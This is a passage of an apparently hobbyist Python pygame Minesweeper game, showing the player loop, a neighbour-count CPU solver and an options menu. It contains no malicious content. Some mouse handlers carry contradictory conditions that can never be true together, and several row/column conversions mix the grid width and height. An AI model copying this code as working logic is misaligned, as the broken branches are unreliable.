-1)\r\n mark_around = False\r\n running = True\r\n while running:\r\n if index_coords != (-1, -1):\r\n delaround(*index_coords)\r\n if game_over != 1:\r\n index_coords = (-1, -1)\r\n\r\n if time_start is None:\r\n time_start = time.time()\r\n\r\n if index_coords_marker != (-1, -1):\r\n i, j = index_coords_marker\r\n if mark_around:\r\n for di, dj in around:\r\n if i+di < 0 or j+dj < 0 or\\\r\n i+di >= size_h or j+dj >= size_w:\r\n continue\r\n if tiles_cover[i+di, j+dj] in (tile_blank_up,\r\n tile_cpumark):\r\n mark(i + di, j + dj)\r\n mark_around = False\r\n else:\r\n mark(*index_coords_marker)\r\n index_coords_marker = (-1, -1)\r\n\r\n if index_coords_clear != (-1, -1):\r\n clear_tiles(*index_coords_clear)\r\n index_coords_clear = (-1, -1)\r\n\r\n for i in range(len(tiles)):\r\n for j in range(len(tiles[i])):\r\n tiles_img[i, j] = tile_img_list[tiles[i, j]]\r\n\r\n draw_img()\r\n draw_cover()\r\n update()\r\n\r\n b = False\r\n for x in range(len(tiles_img)):\r\n for y in range(len(tiles_img[x])):\r\n if tiles_img[x, y] != tile_img_list[9] and\\\r\n tiles_cover[x, y] == tile_img_list[10] and\\\r\n tiles_cover[x, y] != tile_img_list[11]:\r\n b = True\r\n break\r\n if b:\r\n break\r\n else:\r\n cur_time = time.time()-time_start\r\n end_time = cur_time\r\n clear()\r\n write(screen, 'You win!!!',\r\n text_col, None, 36, screen_w//2, 35)\r\n write(screen,\r\n 'Time: ' + str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' 
+\r\n str(round(cur_time-int(cur_time), 2))[2:],\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n show_mines()\r\n draw_img()\r\n draw_cover()\r\n update()\r\n break\r\n\r\n if game_over == 1:\r\n clear()\r\n cur_time = time.time()-time_start\r\n write(screen, 'Game Over.',\r\n text_col, None, 36, screen_w//2, 35)\r\n write(screen,\r\n 'Time: ' + str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' +\r\n str(round(cur_time-int(cur_time), 2))[2:],\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n explode_mines()\r\n show_all()\r\n draw_img()\r\n draw_cover()\r\n update()\r\n break\r\n\r\n while running:\r\n event = pyg.event.get()\r\n pressed = pyg.key.get_pressed()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pyg.QUIT:\r\n running = False\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1:\r\n click = pyg.Rect(event.dict['pos'], (1, 1))\r\n index = click.collidelist(tiles_rect)\r\n if index == -1:\r\n continue\r\n i = index // size_w\r\n j = index % size_h\r\n index_coords = (i, j)\r\n break\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 3:\r\n click = pyg.Rect(event.dict['pos'], (1, 1))\r\n index_marker = click.collidelist(tiles_rect)\r\n if index_marker == -1:\r\n continue\r\n i = index_marker // size_h\r\n j = index_marker % size_w\r\n index_coords_marker = (i, j)\r\n if pressed[pyg.K_LSHIFT] or pressed[pyg.K_RSHIFT]:\r\n empty_up_count = 0\r\n for di, dj in around:\r\n if i+di < 0 or j+dj < 0 or\\\r\n i+di >= size_h or j+dj >= size_w:\r\n continue\r\n if tiles_cover[i+di, j+dj] in tile_img_list[10:12]:\r\n empty_up_count += 1\r\n if empty_up_count == count_mines(i, j):\r\n mark_around = True\r\n break\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 2:\r\n click = pyg.Rect(event.dict['pos'], (1, 1))\r\n index_clear = click.collidelist(tiles_rect)\r\n if index_clear == -1:\r\n continue\r\n i = index_clear // size_h\r\n j = index_clear % size_w\r\n index_coords_clear = (i, j)\r\n break\r\n elif vis_helper and event.type == pyg.MOUSEMOTION:\r\n mouse = pyg.Rect(event.dict['pos'], (1, 1))\r\n hover_index = mouse.collidelist(tiles_rect)\r\n if hover_index == -1:\r\n continue\r\n h_i = hover_index // size_h\r\n h_j = hover_index % size_w\r\n draw_img()\r\n draw_cover()\r\n if tiles[h_i, h_j] not in range(1, 9) or\\\r\n tiles_cover[h_i, h_j] in [tile_mark, tile_blank_up]:\r\n continue\r\n for dx, dy in around: # Draw dot at each of coords\r\n n_i, n_j = h_i+dx, h_j+dy\r\n if n_i >= size_h or n_j >= size_w or n_i < 0 or n_j < 0:\r\n continue\r\n elif tiles_cover[n_i, n_j] not in (tile_mark,\r\n tile_blank_up):\r\n continue\r\n screen.blit(tile_dot,\r\n tiles_rect[hover_index+size_w*dx+dy])\r\n area = pyg.Surface((screen_w, 70))\r\n area.fill(WHITE)\r\n screen.blit(area, (0, 0))\r\n screen.blit(area, (0, screen_h-70))\r\n write(screen, 'Mines Left: '+str(mines_left),\r\n text_col, None, 28, screen_w//2, 50, antialias=False)\r\n cur_time = time.time()-time_start\r\n if show_time:\r\n write(screen,\r\n 'Time: ' + str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' 
+\r\n str(round(cur_time-int(cur_time), 2))[2:].zfill(2),\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n if record_time is not None:\r\n write(screen,\r\n 'Record Time: ' + str(int(record_time)//60) + ':' +\r\n str(int(record_time) % 60).zfill(2) + '.' +\r\n str(round(record_time-int(record_time), 2))[2:].zfill(2),\r\n text_col, None, 28, 25, screen_h-50,\r\n centered=False)\r\n update()\r\n if not running:\r\n pyg.quit()\r\n return\r\n \r\n button = pyg.Surface((100, 50))\r\n button_rect = pyg.Rect(screen_w-162, screen_h//2-75, 100, 50)\r\n button.fill(btn_col)\r\n screen.blit(button, (screen_w-162, screen_h//2-75))\r\n text_x = screen_w-162+button.get_width()//2\r\n text_y = screen_h//2-75+button.get_height()//2\r\n write(screen, 'Again?', text_col, None, 28, text_x, text_y)\r\n\r\n quit_btn = pyg.Surface((75, 50))\r\n quit_btn_rect = pyg.Rect(screen_w-150, screen_h//2+100, 75, 50)\r\n quit_btn.fill(quit_col)\r\n screen.blit(quit_btn, (screen_w-150, screen_h//2+100))\r\n quit_txt_x = screen_w-150+quit_btn.get_width()//2\r\n quit_txt_y = screen_h//2+100+quit_btn.get_height()//2\r\n write(screen, 'Quit?', text_col, None, 24, quit_txt_x, quit_txt_y)\r\n\r\n option_btn = pyg.Surface((100, 50))\r\n option_btn_rect = pyg.Rect(50, screen_h//2-25, 100, 50)\r\n option_btn.fill(option_col)\r\n screen.blit(option_btn, (50, screen_h//2-25))\r\n option_txt_x = 50+option_btn.get_width()//2\r\n option_txt_y = screen_h//2-25+option_btn.get_height()//2\r\n write(screen, 'Options', text_col, None, 26, option_txt_x, option_txt_y)\r\n update()\r\n while True:\r\n event = pyg.event.get()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pyg.QUIT:\r\n pyg.quit()\r\n break\r\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1:\r\n pos = event.dict['pos']\r\n click = pyg.Rect(pos, (1, 1))\r\n if button_rect.colliderect(click):\r\n if record_time and end_time and end_time < record_time:\r\n record_time = end_time\r\n elif record_time is None and end_time:\r\n record_time = end_time\r\n main()\r\n break\r\n elif quit_btn_rect.colliderect(click):\r\n pyg.quit()\r\n break\r\n elif option_btn_rect.colliderect(click):\r\n options()\r\n break\r\n\r\n\r\n\"\"\"AI/CPU\"\"\"\r\n\r\n\r\ndef pick_rand_tile():\r\n global index, index_coords\r\n index = random.randint(0, size_w*size_h-1)\r\n i = index // size_h\r\n j = index % size_w\r\n index_coords = (i, j)\r\n\r\n\r\ndef mark_click(i, j):\r\n tiles_cover[i, j] = tile_cpumark\r\n\r\n\r\ndef count_covered(i, j, mark=True):\r\n cycle = [(i+dx, j+dy) for dx, dy in around]\r\n\r\n c = 0\r\n if mark:\r\n tiles_to_test = (tile_mark, tile_blank_up)\r\n else:\r\n tiles_to_test = (tile_blank_up,)\r\n for x, y in cycle:\r\n if y >= size_w or y < 0 or\\\r\n x >= size_h or x < 0:\r\n continue\r\n if tiles_cover[x, y] in tiles_to_test:\r\n c += 1\r\n return c\r\n\r\n\r\ndef mark_around(i, j):\r\n global mines_left\r\n cycle = [(i+dx, j+dy) for dx, dy in around]\r\n for x, y in cycle:\r\n if y >= size_w or y < 0 or\\\r\n x >= size_h or x < 0:\r\n continue\r\n if tiles_cover[x, y] == tile_blank_up:\r\n tiles_cover[x, y] = tile_mark\r\n\r\n mines_left = mines-list(tiles_cover.flatten()).count(tile_mark)\r\n\r\n\r\n\"\"\"Cpu Main\"\"\"\r\n\r\n\r\ndef cpu_main():\r\n global record_time, cur_time, time_start, end_time,\\\r\n index, game_over, mines_left, mine_indices, index_coords\r\n global tile_1, tile_1_rect, tile_2, tile_2_rect,\\\r\n tile_3, tile_3_rect, tile_4, 
tile_4_rect,\\\r\n tile_5, tile_5_rect, tile_6, tile_6_rect,\\\r\n tile_7, tile_7_rect, tile_8, tile_8_rect,\\\r\n tile_blank, tile_blank_rect, tile_mark, tile_mark_rect,\\\r\n tile_mark_through, tile_mark_through_rect,\\\r\n tile_mine, tile_mine_rect, tile_blank_up, tile_blank_up_rect,\\\r\n tile_blank_up_through, tile_blank_up_through_rect, tile_cpumark,\\\r\n tile_cpumark_rect\r\n global tiles, tiles_img, tile_img_list,\\\r\n tile_h, tile_w, tile_rect_list, tiles_cover, prev_tiles_cover\r\n global times_done, loop\r\n\r\n game_over = 0\r\n cur_time = None\r\n time_start = None\r\n end_time = 2**1000\r\n\r\n mines_left = int(mines)\r\n\r\n \"\"\"Variables/Tiles\"\"\"\r\n tiles = np.array([[0]*size_w]*size_h) # Tiles (numbers)\r\n\r\n resize_tiles()\r\n\r\n # Board tile images\r\n tiles_img = np.array([[tile_img_list[0]]*size_w]*size_h)\r\n # Overlay tile images\r\n tiles_cover = np.array([[tile_blank_up]*size_w]*size_h)\r\n\r\n dest_x = screen_w//2 - (size_w*tile_w)//2 # Destination of tiles\r\n dest_y = screen_h//2 - (size_h*tile_h)//2 # (Centered around middle)\r\n\r\n clear()\r\n\r\n if record_time:\r\n write(screen,\r\n 'Record Time: ' + str(int(record_time)//60) + ':' +\r\n str(int(record_time) % 60).zfill(2) + '.' +\r\n str(round(record_time-int(record_time), 2))[2:].zfill(2),\r\n text_col, None, 28, 25, screen_h-50,\r\n centered=False)\r\n\r\n \"\"\"Draw tiles\"\"\"\r\n for y in tiles_cover: # Go through the tiles vertically\r\n for x in y: # Go through each tile in the lists\r\n blitrect = screen.blit(x, (dest_x, dest_y)) # Draw tile\r\n dest_x += tile_w # Move the destination x-coord to the right\r\n dest_y += tile_h # Move the destination y-coord downwards\r\n dest_x = screen_w//2 - (size_w*tile_w)//2 # Reset x-coord\r\n\r\n update() # Update screen\r\n\r\n area = pyg.Surface((screen_w, 70))\r\n area.fill(WHITE)\r\n screen.blit(area, (0, 0))\r\n\r\n pick_rand_tile()\r\n\r\n \"\"\"Set up board\"\"\"\r\n \"\"\"No-mine locations\"\"\"\r\n no_mines = [\r\n ind_rel(-2, -2), ind_rel(-1, -2),\r\n ind_rel(+0, -2), ind_rel(+1, -2), ind_rel(+2, -2),\r\n ind_rel(-2, -1), ind_rel(-1, -1),\r\n ind_rel(+0, -1), ind_rel(+1, -1), ind_rel(+2, -1),\r\n ind_rel(-2, +0), ind_rel(-1, +0),\r\n ind_rel(+0, +0), ind_rel(+1, +0), ind_rel(+2, +0),\r\n ind_rel(-2, +1), ind_rel(-1, +1),\r\n ind_rel(+0, +1), ind_rel(+1, +1), ind_rel(+2, +1),\r\n ind_rel(-2, +2), ind_rel(-1, +2),\r\n ind_rel(+0, +2), ind_rel(+1, +2), ind_rel(+2, +2)\r\n ] # List of places where there should be no mines at first click\r\n\r\n mine_indices = [index] # Initialize mine indices\r\n while True:\r\n for i in no_mines: # Cycle through places where no mines should be\r\n if i in mine_indices: # If one of the mines is in that place,\r\n mine_indices = random.sample(\r\n range(1, size_w*size_h+1), mines\r\n ) # Randomize mine placement\r\n break # Exit inner loop\r\n else: # When there are no mines in the place where they shouldn't be,\r\n break # Exit loop\r\n\r\n for mine_index in range(len(mine_indices)): # Loop though each mine\r\n index = mine_indices[mine_index] # Record the index\r\n i = (index-1)//size_w # Get the y-coordinate of the index\r\n j = (index-1) % size_h # Get the x-coordinate of the index\r\n mine_indices[mine_index] = (i, j) # Format as ordered pair\r\n tiles[i, j] = 9 # Set the tile number to 9 (denotes mine)\r\n\r\n \"\"\"Number of mines surrounding a tile\"\"\"\r\n for x in range(size_h): # Loop though the vertical coordinates\r\n for y in range(size_w): # Loop through the horizontal coordinates\r\n if 
tiles[x, y] == 9: # If the tile is a mine,\r\n continue # Skip this loop\r\n\r\n tiles[x, y] = count_mines(x, y)\r\n\r\n # Changes tile numbers to tile images with the corresponding numbers\r\n for i in range(len(tiles)):\r\n for j in range(len(tiles[i])):\r\n tiles_img[i, j] = tile_img_list[tiles[i, j]]\r\n\r\n time_start = time.time()\r\n\r\n delaround(*index_coords)\r\n mines_left = int(mines)\r\n cycles = 0\r\n paused = False\r\n no_update = True\r\n while True:\r\n if paused:\r\n event = pyg.event.get()\r\n if event:\r\n event = event[-1]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pyg.KEYDOWN and\\\r\n event.dict['key'] in (pyg.K_p, pyg.K_SPACE):\r\n paused = not paused\r\n continue\r\n prev_tiles_cover = np.array(tiles_cover)\r\n\r\n # Optimization; reduces time spent\r\n\r\n rows_to_check = set()\r\n cols_to_check = set()\r\n\r\n for row in range(0, size_h):\r\n if list(tiles_cover[row]).count(tile_blank_up) > 0:\r\n rows_to_check = rows_to_check.union({row-1, row, row+1})\r\n\r\n transposed_tiles_cover = tiles_cover.transpose()\r\n for col in range(0, size_w):\r\n if list(transposed_tiles_cover[col]).count(tile_blank_up) > 0:\r\n cols_to_check = cols_to_check.union({col-1, col, col+1})\r\n\r\n # Goes through each uncovered tile\r\n for i in range(0, size_h):\r\n for j in range(0, size_w):\r\n if tiles_cover[i, j] not in (tile_blank_up, tile_mark):\r\n if count_covered(i, j, mark=False) == 0:\r\n continue\r\n \"\"\"Event setup\"\"\"\r\n event_list = pyg.event.get()\r\n if not event_list:\r\n event_list = [pyg.event.Event(-1)]\r\n for event in event_list:\r\n if event.type == pyg.QUIT:\r\n try:\r\n pyg.quit()\r\n except:\r\n pass\r\n elif wait > 0 and event.type == pyg.KEYDOWN and\\\r\n event.dict['key'] in (pyg.K_p, pyg.K_SPACE):\r\n paused = not paused\r\n\r\n \"\"\"Cpu Marker\"\"\"\r\n if wait > 0:\r\n tiles_cover[i, j] = tile_cpumark\r\n draw_cover()\r\n\r\n \"\"\"Count tiles around (i, j). If = tile #, mark.\"\"\"\r\n if count_covered(i, j) == tiles[i, j]:\r\n mark_around(i, j)\r\n clear_tiles(i, j)\r\n\r\n \"\"\"Special Case 1\"\"\"\r\n # testcase_1(i, j)\r\n\r\n \"\"\"Test Game Over\"\"\"\r\n tiles_cover_list = list(tiles_cover.flatten())\r\n blank_c = tiles_cover_list.count(tile_blank_up)\r\n if blank_c == 0:\r\n game_over = 2\r\n tiles_cover[i, j] = pyg.Surface((0, 0))\r\n break\r\n\r\n if wait > 0:\r\n if tiles_img[i, j] in tile_img_list[1:9]:\r\n draw_img()\r\n draw_cover()\r\n update()\r\n pyg.time.wait(wait)\r\n area = pyg.Surface((screen_w, 70))\r\n area.fill(WHITE)\r\n screen.blit(area, (0, 0))\r\n screen.blit(area, (0, screen_h-70))\r\n\r\n cur_time = time.time()-time_start\r\n write(screen,\r\n 'Time: '+str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' 
+\r\n str(round(\r\n cur_time-int(cur_time), 2))[2:].zfill(2),\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n\r\n draw_mines_left()\r\n\r\n tiles_cover[i, j] = pyg.Surface((0, 0))\r\n\r\n if game_over:\r\n break\r\n if not no_update:\r\n draw_img()\r\n draw_cover()\r\n update()\r\n same = True\r\n for row in range(0, len(tiles_cover)):\r\n for col in range(0, len(tiles_cover[0])):\r\n if tiles_cover[row, col] in (tile_blank_up, tile_mark):\r\n if tiles_cover[row, col] != prev_tiles_cover[row, col]:\r\n same = False\r\n else:\r\n if prev_tiles_cover[row, col] in\\\r\n (tile_blank_up, tile_mark):\r\n same = False\r\n if not same:\r\n break\r\n if not same:\r\n break\r\n if game_over == 2:\r\n draw_img()\r\n draw_cover()\r\n write(screen, \"Done.\", BLACK, None, 28, screen_w//2, 35)\r\n update()\r\n break\r\n elif same:\r\n draw_img()\r\n draw_cover()\r\n write(screen,\r\n \"The CPU could not solve this Minesweeper.\" +\r\n \" Guessing or advanced deduction is needed.\",\r\n BLACK, None, 28, screen_w//2, 35)\r\n update()\r\n break\r\n\r\n button = pyg.Surface((100, 50))\r\n button_rect = pyg.Rect(screen_w-162, screen_h//2-75, 100, 50)\r\n button.fill(btn_col)\r\n screen.blit(button, (screen_w-162, screen_h//2-75))\r\n text_x = screen_w-162+button.get_width()//2\r\n text_y = screen_h//2-75+button.get_height()//2\r\n write(screen, 'Again?', text_col, None, 28, text_x, text_y)\r\n\r\n quit_btn = pyg.Surface((75, 50))\r\n quit_btn_rect = pyg.Rect(screen_w-150, screen_h//2+100, 75, 50)\r\n quit_btn.fill(quit_col)\r\n screen.blit(quit_btn, (screen_w-150, screen_h//2+100))\r\n quit_txt_x = screen_w-150+quit_btn.get_width()//2\r\n quit_txt_y = screen_h//2+100+quit_btn.get_height()//2\r\n write(screen, 'Quit?', text_col, None, 24, quit_txt_x, quit_txt_y)\r\n\r\n option_btn = pyg.Surface((100, 50))\r\n option_btn_rect = pyg.Rect(50, screen_h//2-25, 100, 50)\r\n option_btn.fill(option_col)\r\n screen.blit(option_btn, (50, screen_h//2-25))\r\n option_txt_x = 50+option_btn.get_width()//2\r\n option_txt_y = screen_h//2-25+option_btn.get_height()//2\r\n write(screen, 'Options', text_col, None, 26, option_txt_x, option_txt_y)\r\n update()\r\n while True:\r\n event = pyg.event.get()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1:\r\n pos = event.dict['pos']\r\n click = pyg.Rect(pos, (1, 1))\r\n if button_rect.colliderect(click):\r\n if record_time and end_time and end_time < record_time:\r\n record_time = end_time\r\n elif record_time is None and end_time:\r\n record_time = end_time\r\n cpu_main()\r\n break\r\n elif quit_btn_rect.colliderect(click):\r\n pyg.quit()\r\n break\r\n elif option_btn_rect.colliderect(click):\r\n options()\r\n break\r\n elif event.type == pyg.KEYDOWN and\\\r\n event.dict['key'] in (pyg.K_r, pyg.K_RETURN):\r\n cpu_main()\r\n if loop > 0:\r\n if game_over == 2:\r\n times_done['Done'] += 1\r\n res = 'Done'\r\n elif same:\r\n times_done['Break'] += 1\r\n res = 'Break'\r\n print(res, 'Done:', times_done['Done'],\r\n 'Break:', times_done['Break'])\r\n pyg.time.wait(loop)\r\n cpu_main()\r\n\r\n\r\n\"\"\"Options Menu\"\"\"\r\n\r\n\r\ndef opt_draw_tiles_cover():\r\n global size_w, size_h, tile_w, tile_h, opt_tiles_cover_img\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n dest_y = screen_h//2 - (size_h*tile_h)//2\r\n\r\n for y in opt_tiles_cover_img:\r\n for x in y:\r\n screen.blit(x, (dest_x, dest_y))\r\n dest_x += tile_w\r\n dest_y += 
tile_h\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n\r\n\r\ndef options():\r\n global size_w, size_h, tile_w, tile_h, mines,\\\r\n opt_tiles_cover_img, show_destroy, cpu, wait,\\\r\n mode, around, show_time\r\n\r\n def count_mines(x, y):\r\n global size_w, size_h, tiles2, around\r\n c = 0\r\n for dx, dy in around:\r\n if x+dx >= size_h or y+dy >= size_w or x+dx < 0 or y+dy < 0:\r\n continue\r\n elif tiles2[x+dx, y+dy] == 9:\r\n c += 1\r\n return c\r\n\r\n def set_mines():\r\n global size_w, size_h, tiles2, mines\r\n\r\n tiles2 = np.array([[0]*size_w]*size_h)\r\n\r\n mine_indices = random.sample(\r\n range(0, size_w*size_h), mines\r\n ) # Randomize mine placement\r\n\r\n \"\"\"Mine placement\"\"\"\r\n for mine_index in range(len(mine_indices)): # Loop though each mine\r\n index = mine_indices[mine_index] # Record the index\r\n i = (index)//(size_w) # Get the y-coordinate of the index\r\n j = (index) % size_w # Get the x-coordinate of the index\r\n mine_indices[mine_index] = (i, j) # Format as ordered pair\r\n tiles2[i, j] = 9 # Set the tile number to 9 (denotes mine)\r\n\r\n \"\"\"Number of mines surrounding a tile\"\"\"\r\n for x in range(size_h): # Loop though the vertical coordinates\r\n for y in range(size_w): # Loop through the horizontal coordinates\r\n if tiles2[x, y] == 9: # If the tile is a mine,\r\n continue # Skip this loop\r\n tiles2[x, y] = count_mines(x, y)\r\n pyg.event.pump()\r\n\r\n option = 1\r\n\r\n set_mines()\r\n\r\n # Board tile images\r\n opt_tiles_cover_img = np.array([[tile_img_list[0]]*size_w]*size_h)\r\n\r\n # Changes tile numbers to tile images with the corresponding numbers\r\n for i in range(len(tiles)):\r\n for j in range(len(tiles[i])):\r\n opt_tiles_cover_img[i, j] = tile_img_list[tiles2[i, j]]\r\n\r\n d = tile_img_list[17]\r\n o = tile_img_list[0]\r\n m = tile_img_list[16]\r\n running = True\r\n while running:\r\n clear()\r\n # Board tile images\r\n opt_tiles_cover_img = np.array([[tile_img_list[0]]*size_w]*size_h)\r\n\r\n # Changes tile numbers to tile images with the corresponding numbers\r\n for i in range(len(tiles2)):\r\n for j in range(len(tiles2[i])):\r\n opt_tiles_cover_img[i, j] = tile_img_list[tiles2[i, j]]\r\n\r\n # Mode explanation images\r\n mode_expl_back = np.array([[tile_img_list[0]]*5]*5)\r\n if mode == 1: # Normal\r\n mode_expl_img = np.array([[o, o, o, o, o],\r\n [o, d, d, d, o],\r\n [o, d, m, d, o],\r\n [o, d, d, d, o],\r\n [o, o, o, o, o]])\r\n elif mode == 2: # Knight's path\r\n mode_expl_img = np.array([[o, d, o, d, o],\r\n [d, o, o, o, d],\r\n [o, o, m, o, o],\r\n [d, o, o, o, d],\r\n [o, d, o, d, o]])\r\n elif mode == 3: # Orthogonal\r\n mode_expl_img = np.array([[o, o, o, o, o],\r\n [o, o, d, o, o],\r\n [o, d, m, d, o],\r\n [o, o, d, o, o],\r\n [o, o, o, o, o]])\r\n elif mode == 4: # Far orthogonal\r\n mode_expl_img = np.array([[o, o, d, o, o],\r\n [o, o, d, o, o],\r\n [d, d, m, d, d],\r\n [o, o, d, o, o],\r\n [o, o, d, o, o]])\r\n elif mode == 5: # Diagonal\r\n mode_expl_img = np.array([[o, o, o, o, o],\r\n [o, d, o, d, o],\r\n [o, o, m, o, o],\r\n [o, d, o, d, o],\r\n [o, o, o, o, o]])\r\n elif mode == 6: # Far diagonal\r\n mode_expl_img = np.array([[d, o, o, o, d],\r\n [o, d, o, d, o],\r\n [o, o, m, o, o],\r\n [o, d, o, d, o],\r\n [d, o, o, o, d]])\r\n\r\n resize_tiles()\r\n opt_draw_tiles_cover()\r\n write(screen, 'Options', text_col, None, 28, screen_w//2, 50)\r\n\r\n change_optn = pyg.Surface((150, 50))\r\n change_optn_rect = pyg.Rect(150, screen_h//2-75, 150, 50)\r\n change_optn.fill(change_optn_col)\r\n 
screen.blit(change_optn, (100, screen_h//2-75))\r\n text_x = 100+change_optn.get_width()//2\r\n text_y = screen_h//2-75+change_optn.get_height()//2\r\n write(screen, 'Change Option:', text_col, None, 26, text_x, text_y-50)\r\n\r\n again_optn = pyg.Surface((150, 50))\r\n again_optn_rect = pyg.Rect(150, screen_h//2+75, 150, 50)\r\n again_optn.fill(btn_col)\r\n screen.blit(again_optn, (100, screen_h//2+75))\r\n again_text_x = 100+again_optn.get_width()//2\r\n again_text_y = screen_h//2+75+again_optn.get_height()//2\r\n write(screen, 'Back', text_col, None, 26, again_text_x, again_text_y)\r\n\r\n up = pyg.Surface((25, 25))\r\n up_rect = pyg.Rect(screen_w-150, screen_h//2-38, 25, 25)\r\n up.fill(up_col)\r\n screen.blit(up, (screen_w-150, screen_h//2-38))\r\n up_text_x = screen_w-150+up.get_width()//2\r\n up_text_y = screen_h//2-38+up.get_height()//2\r\n write(screen, '+', text_col, None, 20, up_text_x, up_text_y)\r\n\r\n down = pyg.Surface((25, 25))\r\n down_rect = pyg.Rect(screen_w-150, screen_h//2+38, 25, 25)\r\n down.fill(up_col)\r\n screen.blit(down, (screen_w-150, screen_h//2+38))\r\n down_text_x = screen_w-150+down.get_width()//2\r\n down_text_y = screen_h//2+38+down.get_height()//2\r\n write(screen, '-', text_col, None, 20, down_text_x, down_text_y)\r\n\r\n if option == 1:\r\n write(screen, 'Grid width', text_col, None, 26, text_x, text_y)\r\n write(screen, str(size_w),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 2:\r\n write(screen, 'Grid height', text_col, None, 26, text_x, text_y)\r\n write(screen, str(size_h),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 3:\r\n write(screen, 'Mine number', text_col, None, 26, text_x, text_y)\r\n write(screen, str(mines),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 4:\r\n write(screen, 'Show destroy', text_col, None, 26, text_x, text_y)\r\n write(screen, str(show_destroy),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 5:\r\n write(screen, 'CPU', text_col, None, 26, text_x, text_y)\r\n write(screen, str(cpu),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif cpu and option == 6:\r\n write(screen, 'Wait', text_col, None, 26, text_x, text_y)\r\n write(screen, str(wait),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 7:\r\n write(screen, 'Mode', text_col, None, 26, text_x, text_y)\r\n write(screen, modes_str[mode],\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n\r\n # Draw mode explanation picture\r\n dest_x = screen_w-140-2.5*tile_w\r\n dest_y = screen_h//2-150-2.5*tile_h\r\n for i in range(5):\r\n for j in range(5):\r\n screen.blit(mode_expl_back[j, i], (dest_x, dest_y))\r\n screen.blit(mode_expl_img[j, i], (dest_x, dest_y))\r\n dest_x += tile_w\r\n dest_y += tile_h\r\n dest_x = screen_w-140-2.5*tile_w\r\n elif option == 8:\r\n write(screen, 'Show Time', text_col, None, 26, text_x, text_y)\r\n write(screen, str(show_time),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n else:\r\n option = 1\r\n\r\n event = pyg.event.get()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n\r\n if event.type == pyg.QUIT:\r\n running = False\r\n break\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1:\r\n pos = event.dict['pos']\r\n click = pyg.Rect(pos, (1, 1))\r\n if change_optn_rect.colliderect(click):\r\n option += 1\r\n if not cpu and option == 6: # Skip wait option if cpu enabled\r\n option = 7\r\n elif option == 9: # 
Loop around\r\n option = 1\r\n elif up_rect.colliderect(click):\r\n if option == 1: # Width\r\n if (size_w+1)*size_h > mines-25:\r\n size_w += 1\r\n set_mines()\r\n elif option == 2: # Height\r\n if size_w*(size_h+1) > mines-25:\r\n size_h += 1\r\n set_mines()\r\n elif option == 3: # Mines\r\n if size_w*size_h > mines-24:\r\n mines += 1\r\n set_mines()\r\n elif option == 4: # Show Destroy\r\n show_destroy = not show_destroy\r\n elif option == 5: # CPU\r\n cpu = not cpu\r\n elif cpu and option == 6: # Wait\r\n wait += 1\r\n elif option == 7: # Mode\r\n mode += 1\r\n if mode > max(modes_str):\r\n mode = 1\r\n elif option == 8:\r\n show_time = not show_time\r\n elif down_rect.colliderect(click):\r\n if option == 1:\r\n if size_w-1 > 0 and (size_w-1)*size_h > mines+25:\r\n size_w -= 1\r\n set_mines()\r\n elif option == 2:\r\n if size_h-1 > 0 and size_w*(size_h-1) > mines+25:\r\n size_h -= 1\r\n set_mines()\r\n elif option == 3:\r\n if mines-1 > 0 and size_w*size_h > mines+24:\r\n mines -= 1\r\n set_mines()\r\n elif option == 4:\r\n show_destroy = not show_destroy\r\n elif option == 5:\r\n cpu = not cpu\r\n elif cpu and option == 6:\r\n if wait > 0:\r\n wait -= 1\r\n elif option == 7:\r\n mode -= 1\r\n if mode < 1:\r\n mode = max(modes_str)\r\n elif option == 8:\r\n show_time = not show_time\r\n elif again_optn_rect.colliderect(click):\r\n if cpu:\r\n cpu_main()\r\n elif not cpu:\r\n main()\r\n return\r\n\r\n keys_pressed = pyg.key.get_pressed()\r\n if keys_pressed[pyg.K_UP]:\r\n if option == 1:\r\n if (size_w+1)*size_h > mines+25:\r\n size_w += 1\r\n set_mines()\r\n elif option == 2:\r\n if size_w*(size_h+1) > mines+25:\r\n size_h += 1\r\n set_mines()\r\n elif option == 3:\r\n if size_w*size_h > mines+26:\r\n mines += 1\r\n set_mines()\r\n elif option == 4:\r\n show_destroy = not show_destroy\r\n elif option == 5:\r\n cpu = not cpu\r\n elif option == 6:\r\n wait += 1\r\n elif option == 7:\r\n mode += 1\r\n if mode > max(modes_str):\r\n mode = 1\r\n set_mode()\r\n elif option == 8:\r\n show_time = not show_time\r\n elif keys_pressed[pyg.K_DOWN]:\r\n if option == 1:\r\n if size_w-1 > 0 and (size_w-1)*size_h > 